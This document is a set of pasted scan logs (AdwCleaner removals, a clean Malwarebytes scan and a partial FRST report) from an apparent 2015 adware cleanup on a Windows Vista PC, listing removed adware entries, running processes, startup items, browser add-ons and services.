Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\reimage repair
Folder Deleted : C:\Program Files\AskPartnerNetwork
Folder Deleted : C:\Program Files\Driver Pro
Folder Deleted : C:\Program Files\LPT
Folder Deleted : C:\Program Files\Reimage
Folder Deleted : C:\Program Files\StormWatch
Folder Deleted : C:\Program Files\Shop For Rewards
Folder Deleted : C:\Users\Angel\AppData\Local\LPT
Folder Deleted : C:\Users\Angel\AppData\Local\StormWatch
Folder Deleted : C:\Users\Angel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StormWatch
File Deleted : C:\Users\Public\Desktop\PC Scan & Repair by Reimage.lnk
File Deleted : C:\Windows\Reimage.ini
File Deleted : C:\Windows\score.exe
File Deleted : C:\Windows\system32\dsrvprn.exe
File Deleted : C:\Windows\system32\drivers\netfilter.sys
File Deleted : C:\Users\Angel\Documents\ReimageRepair.exe
File Deleted : C:\Program Files\Mozilla Firefox\components\AskSearch.js
File Deleted : C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\invalidprefs.js
File Deleted : C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\user.js
 
***** [ Scheduled tasks ] *****
 
Task Deleted : LaunchSignup
Task Deleted : Reimage Reminder
Task Deleted : ReimageUpdater
 
***** [ Shortcuts ] *****
 
 
***** [ Registry ] *****
 
Key Deleted : HKLM\SOFTWARE\Google\Chrome\Extensions\jmfkcklnlgedgbglfkkgedjfmejoahla
Key Deleted : HKLM\SOFTWARE\Classes\Conduit.Engine
Key Deleted : HKLM\SOFTWARE\Classes\speedupmypc
Key Deleted : HKLM\SOFTWARE\Classes\AppID\REI_AxControl.DLL
Key Deleted : HKLM\SOFTWARE\Classes\REI_AxControl.ReiEngine.1
Key Deleted : HKLM\SOFTWARE\Classes\REI_AxControl.ReiEngine
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Reimage.exe
Key Deleted : HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
Key Deleted : HKLM\SOFTWARE\Classes\Toolbar.CT2418376
Key Deleted : HKLM\SOFTWARE\Classes\AppID\{28FF42B8-A0DA-4BE5-9B81-E26DD59B350A}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{9AFB8248-617F-460D-9366-D71CDEDA3179}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{459DD0F7-0D55-D3DC-67BC-E6BE37E9D762}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{D52F7CE0-A4BA-4220-A907-444CB6158A09}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{10ECCE17-29B5-4880-A8F5-EAD298611484}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{801B440B-1EE3-49B0-B05D-2AB076D4E8CB}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{5075DFCC-F3F5-4B15-B364-270BC7C585AD}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{895F78F3-9620-49AD-8AA8-E6802E5AC64E}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{9BB31AD8-5DB2-459E-A901-DEA536F23BA4}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{BD51A48E-EB5F-4454-8774-EF962DF64546}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{0902EBD9-C5B4-4400-8CF1-7ACA8E8805D9}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{FA6468D2-FAA4-4951-A53B-2A5CF9CC0A36}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{EEE6C35D-6118-11DC-9C72-001320C79847}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{AE07101B-46D4-4A98-AF68-0333EA26E113}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{10ECCE17-29B5-4880-A8F5-EAD298611484}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{DF7770F7-832F-4BDF-B144-100EDDD0C3AE}
Key Deleted : HKCU\Software\Driver Pro
Key Deleted : HKCU\Software\Fabulous
Key Deleted : HKCU\Software\GlobalUpdate
Key Deleted : HKCU\Software\PennyBee
Key Deleted : HKCU\Software\systweak
Key Deleted : HKCU\Software\YahooPartnerToolbar
Key Deleted : HKCU\Software\Reimage
Key Deleted : HKCU\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F}
Key Deleted : HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
Key Deleted : HKLM\SOFTWARE\{6791A2F3-FC80-475C-A002-C014AF797E9C}
Key Deleted : HKLM\SOFTWARE\systweak
Key Deleted : HKLM\SOFTWARE\TBID
Key Deleted : HKLM\SOFTWARE\Reimage
Key Deleted : HKLM\SOFTWARE\SPPDCOM
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Reimage Repair
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{10A0E600-D246-BD63-F465-4C849C688998}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\{21EAF666-26B3-4a3c-ABD0-CA2F5A326744}_is1
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\{BC0BF363-63AB-4FF7-8EF1-AE0D7F711B24}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\conduitEngine
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\MyPC Backup
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\RocketTab
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\TVWizard
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\StormWatch
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\Salus
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\{37476589-E48E-439E-A706-56189E2ED4C4}_is1
Data Deleted : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows [AppInit_DLLs] - C:\PROGRA~1\SearchProtect\SearchProtect\bin\SPVC32Loader.dll
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\649A52D257CA5DB4EAAE8BA9EB23E467
Data Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings [ProxyServer] - hxxp=127.0.0.1:49172;hxxps=127.0.0.1:49172
Data Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings [ProxyOverride] - <-loopback>;*.local
 
***** [ Web browsers ] *****
 
-\\ Internet Explorer v9.0.8112.16633
 
 
-\\ Mozilla Firefox v
 
 
-\\ Google Chrome v41.0.2272.118
 
 
*************************
 
AdwCleaner[R0].txt - [25555 bytes] - [02/04/2015 14:13:29]
AdwCleaner[R1].txt - [1312 bytes] - [02/04/2015 14:19:40]
AdwCleaner[R2].txt - [1430 bytes] - [02/04/2015 18:05:15]
AdwCleaner[S0].txt - [18594 bytes] - [02/04/2015 14:14:40]
AdwCleaner[S1].txt - [1098 bytes] - [02/04/2015 14:22:26]
 
########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [18713  bytes] ##########
 
Malwarebytes Anti-Malware
www.malwarebytes.org
 
Scan Date: 4/13/2015
Scan Time: 2:49:32 PM
Logfile: Malware.txt
Administrator: Yes
 
Version: 2.01.4.1018
Malware Database: v2015.04.13.07
Rootkit Database: v2015.03.31.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled
 
OS: Windows Vista Service Pack 2
CPU: x86
File System: NTFS
User: Angel
 
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 325116
Time Elapsed: 15 min, 13 sec
 
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled
 
Processes: 0
(No malicious items detected)
 
Modules: 0
(No malicious items detected)
 
Registry Keys: 0
(No malicious items detected)
 
Registry Values: 0
(No malicious items detected)
 
Registry Data: 0
(No malicious items detected)
 
Folders: 0
(No malicious items detected)
 
Files: 0
(No malicious items detected)
 
Physical Sectors: 0
(No malicious items detected)
 
 
(end)
 
Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 13-04-2015
Ran by Angel (administrator) on ANGEL-PC on 13-04-2015 15:09:51
Running from C:\Users\Angel\Desktop
Loaded Profiles: Angel (Available profiles: Angel)
Platform: Microsoft® Windows Vista™ Home Premium  Service Pack 2 (X86) OS Language: English (United States)
Internet Explorer Version 9 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(Andrea Electronics Corporation) C:\Windows\System32\AERTSrv.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Teruten) C:\Windows\System32\FsUsbExService.Exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDFSSvc.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDUpdSvc.exe
(Intel Corporation) C:\Program Files\Intel\Intel Matrix Storage Manager\IAANTmon.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDWSCSvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Realtek Semiconductor) C:\Windows\RtHDVCpl.exe
(Intel Corporation) C:\Program Files\Intel\Intel Matrix Storage Manager\IAAnotif.exe
(CyberLink Corp.) C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
(SEIKO EPSON CORPORATION) C:\Program Files\epson\Creativity Suite\Event Manager\EEventManager.exe
(Hewlett-Packard Company) C:\Program Files\HP\HP Software Update\hpwuSchd2.exe
(Hewlett-Packard) C:\Windows\System32\hphmon06.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDTray.exe
() C:\Program Files\Smgy0ntk1mjjizdb\mgi0nzk4mjziyjb.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
(Microsoft Corporation) C:\Windows\ehome\ehtray.exe
(Macrovision Corporation) C:\Program Files\Common Files\InstallShield\UpdateService\ISUSPM.exe
(Microsoft Corporation) C:\Program Files\Windows Live\Messenger\msnmsgr.exe
(Samsung Electronics Co., Ltd.) C:\Program Files\SAMSUNG\Samsung New PC Studio\NPSAgent.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE
(Microsoft Corporation) C:\Windows\ehome\ehmsas.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\wbem\unsecapp.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Hewlett-Packard Co.) C:\Program Files\HP\digital imaging\bin\hpqgalry.exe
(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbam.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [Windows Defender] => C:\Program Files\Windows Defender\MSASCui.exe [1008184 2008-01-20] (Microsoft Corporation)
HKLM\...\Run: [RtHDVCpl] => C:\Windows\RtHDVCpl.exe [6265376 2008-08-19] (Realtek Semiconductor)
HKLM\...\Run: [IAAnotif] => C:\Program Files\Intel\Intel Matrix Storage Manager\iaanotif.exe [182808 2008-07-20] (Intel Corporation)
HKLM\...\Run: [PDVDDXSrv] => C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe [128296 2008-05-23] (CyberLink Corp.)
HKLM\...\Run: [GrooveMonitor] => C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe [30040 2009-02-26] (Microsoft Corporation)
HKLM\...\Run: [EEventManager] => C:\Program Files\EPSON\Creativity Suite\Event Manager\EEventManager.exe [102400 2005-04-08] (SEIKO EPSON CORPORATION)
HKLM\...\Run: [HPHUPD06] => C:\Program Files\HP\{AAC4FC36-8F89-4587-8DD3-EBC57C83374D}\hphupd06.exe [49152 2004-06-06] (Hewlett-Packard)
HKLM\...\Run: [HP Software Update] => C:\Program Files\HP\HP Software Update\HPWuSchd2.exe [49152 2004-02-12] (Hewlett-Packard Company)
HKLM\...\Run: [HP Component Manager] => C:\Program Files\HP\hpcoretech\hpcmpmgr.exe [241664 2004-05-12] (Hewlett-Packard Company)
HKLM\...\Run: [HPHmon06] => C:\Windows\system32\hphmon06.exe [659456 2004-06-06] (Hewlett-Packard)
HKLM\...\Run: [NPSStartup] => [X]
HKLM\...\Run: [APSDaemon] => C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe [60712 2015-01-20] (Apple Inc.)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [978520 2015-01-30] (Microsoft Corporation)
HKLM\...\Run: [SDTray] => C:\Program Files\Spybot - Search & Destroy 2\SDTray.exe [4101576 2014-06-24] (Safer-Networking Ltd.)
HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\QTTask.exe [421888 2014-10-02] (Apple Inc.)
HKLM\...\Run: [mgy0ntk1mjjizdb] => C:\Program Files\Smgy0ntk1mjjizdb\mgi0nzk4mjziyjb.exe [2391040 2015-02-15] ()
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [152392 2014-07-08] (Apple Inc.)
Winlogon\Notify\SDWinLogon: SDWinLogon.dll [X]
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [125952 2008-01-20] (Microsoft Corporation)
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\...\Run: [ISUSPM] => C:\Program Files\Common Files\InstallShield\UpdateService\ISUSPM.exe [218032 2006-09-11] (Macrovision Corporation)
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\...\Run: [msnmsgr] => C:\Program Files\Windows Live\Messenger\msnmsgr.exe [3882312 2008-12-02] (Microsoft Corporation)
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\...\Run: [AutoStartNPSAgent] => C:\Program Files\SAMSUNG\Samsung New PC Studio\NPSAgent.exe [95576 2010-07-04] (Samsung Electronics Co., Ltd.)
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\...\Run: [Spybot-S&D Cleaning] => C:\Program Files\Spybot - Search & Destroy 2\SDCleaner.exe [4566952 2014-06-24] (Safer-Networking Ltd.)
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner.exe [5529880 2015-03-13] (Piriform Ltd)
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\WLXPGSS.SCR [307560 2008-12-04] (Microsoft Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Digital Imaging Monitor.lnk
ShortcutTarget: HP Digital Imaging Monitor.lnk -> C:\Program Files\HP\digital imaging\bin\hpqtra08.exe (Hewlett-Packard Co.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Image Zone Fast Start.lnk
ShortcutTarget: HP Image Zone Fast Start.lnk -> C:\Program Files\HP\digital imaging\bin\hpqthb08.exe (Hewlett-Packard Co.)
Startup: C:\Users\Angel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
GroupPolicy: Group Policy on Chrome detected <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO: No Name -> {1FD79A59-37B1-459B-9097-09F9FAB8A523} ->  No File
BHO: No Name -> {5C255C8A-E604-49b4-9D64-90988571CECB} ->  No File
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll [2009-02-26] (Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Oracle\JavaFX 2.1 Runtime\bin\ssv.dll [2012-05-04] (Oracle Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Oracle\JavaFX 2.1 Runtime\bin\jp2ssv.dll [2012-05-04] (Oracle Corporation)
Toolbar: HKU\S-1-5-21-1464855766-1936325176-3098395914-1000 -> No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} -  No File
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll [2009-02-26] (Microsoft Corporation)
Handler: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8050.1202.dll [2008-12-02] (Microsoft Corporation)
Handler: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8050.1202.dll [2008-12-02] (Microsoft Corporation)
Winsock: Catalog5 07 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
StartMenuInternet: IEXPLORE.EXE - iexplore.exe
 
FireFox:
========
FF ProfilePath: C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_16_0_0_305.dll [2015-02-04] ()
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll [2014-02-21] ()
FF Plugin: @java.com/DTPlugin,version=10.5.1 -> C:\Program Files\Oracle\JavaFX 2.1 Runtime\bin\dtplugin\npDeployJava1.dll [2012-05-04] (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-13] ( Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=14.0.8051.1204 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll [2008-12-04] (Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll [2008-07-30] (Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.26.9\npGoogleUpdate3.dll [2015-02-10] (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.26.9\npGoogleUpdate3.dll [2015-02-10] (Google Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll [2014-12-03] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1464855766-1936325176-3098395914-1000: @soe.sony.com/installer,version=1.0.3 -> C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\extensions\{38AB6A6C-CC4C-4f9e-A3DD-3C5681EF18A1}\plugins\npsoe.dll No File
FF Plugin HKU\S-1-5-21-1464855766-1936325176-3098395914-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Angel\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2014-10-17] (Unity Technologies ApS)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\np-mswmp.dll [2007-04-10] (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npCouponPrinter.dll [2008-06-18] (Coupons, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\NPOFF12.DLL [2006-10-26] (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppdf32.dll [2014-05-08] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin.dll [2014-05-29] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin2.dll [2014-05-29] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin3.dll [2014-05-29] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin4.dll [2014-05-29] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin5.dll [2014-05-29] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\NPTURNMED.dll [2009-03-11] (CNN)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\np_gp.dll [2009-09-23] (NOS Microsystems Ltd.)
FF SearchPlugin: C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\searchplugins\allrecipes.xml [2009-01-16]
FF SearchPlugin: C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\searchplugins\facebook.xml [2012-11-26]
FF SearchPlugin: C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\searchplugins\imdb.xml [2008-11-05]
FF SearchPlugin: C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\searchplugins\punditkitchennetwork.xml [2009-04-08]
FF SearchPlugin: C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\searchplugins\searchcanvas.xml [2014-08-09]
FF Extension: No Name - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\aoiuyau@vbgdka.edu [2014-07-29]
FF Extension: FoxSaver - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\foxsaver@www.foxsaver.com [2011-08-29]
FF Extension: Move Media Player - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\moveplayer@movenetworks.com [2009-02-17]
FF Extension: Tab To Window - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\tabtowindow@sogame.cat [2009-06-15]
FF Extension: No Name - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\yeeyiye@bffm.org [2014-08-09]
FF Extension: Microsoft .NET Framework Assistant - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\{20a82645-c095-46ed-80e3-08825760534b} [2010-05-01]
FF Extension: IE Tab - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\{77b819fa-95ad-4f2c-ac7c-486b356188a9} [2013-06-07]
FF Extension: No Name - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\{7b13ec3e-999a-4b70-b9cb-2617b8323822} [2014-07-13]
FF Extension: Personas Plus - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\personas@christopher.beard.xpi [2013-03-03]
FF Extension: Halloween - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\{BB359C50-BFC9-4f40-8302-3FE5A499A859}.xpi [2012-05-07]
FF Extension: Adblock Plus - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2012-05-07]
FF Extension: Red Cats (green flavor) - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\{dd30bf68-268a-4815-ad48-8740b774c764}.xpi [2012-05-07]
FF Extension: Red Cats (blue flavor) - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\{ff356687-aa08-463d-a46c-11c451824939}.xpi [2012-05-07]
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-02-16]
StartMenuInternet: FIREFOX.EXE - firefox.exe
 
Chrome: 
=======
CHR HomePage: Default -> hxxp://www.google.com
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR Profile: C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Drive) - C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-07-02]
CHR Extension: (YouTube) - C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2011-12-16]
CHR Extension: (Adblock Plus) - C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2015-04-02]
CHR Extension: (Google Search) - C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2011-12-16]
CHR Extension: (Chrome Hotword Shared Module) - C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-03-16]
CHR Extension: (Google Wallet) - C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-09-16]
CHR Extension: (Gmail) - C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2011-12-16]
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AERTFilters; C:\Windows\system32\AERTSrv.exe [81920 2008-08-19] (Andrea Electronics Corporation)
S3 getPlusHelper; C:\Program Files\NOS\bin\getPlus_Helper.dll [51168 2009-09-23] (NOS Microsystems Ltd.)
S3 IDriverT; C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe [73728 2004-10-22] (Macrovision Corporation) [File not signed]
S2 MBAMService; C:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe [1080120 2015-03-17] (Malwarebytes Corporation)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [22184 2015-01-30] (Microsoft Corporation)
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [284472 2015-01-30] (Microsoft Corporation)
S3 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.exe [65536 2004-03-18] (HP) [File not signed]
R2 SDScannerService; C:\Program Files\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files\Spybot - Search & Destroy 2\SDUpdSvc.exe [2088408 2014-06-27] (Safer-Networking Ltd.)
R2 SDWSCService; C:\Program Files\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2014-04-25] (Safer-Networking Ltd.)
